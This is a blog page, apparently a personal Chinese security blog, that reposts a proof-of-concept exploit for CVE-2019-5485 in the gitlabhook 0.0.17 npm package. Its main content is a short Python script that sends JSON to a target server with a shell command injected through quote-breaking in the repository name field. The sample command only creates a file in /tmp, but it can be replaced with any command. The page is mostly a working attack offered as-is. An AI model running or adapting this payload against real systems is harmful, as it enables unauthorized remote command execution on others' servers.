头像

Jaky

今天又是美好的一天!

11 5 2
文章 分类 评论

相恋距今天已有1256 天。

标签云

友情链接

当前位置:首页 » Nday » NPMJS gitlabhook 0.0.17 - (repository) Remote Command Execution Exploit

2019-09-27

44人围观

分类: Nday

标签:


# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."


作者:

丨随风飘着,不也挺好。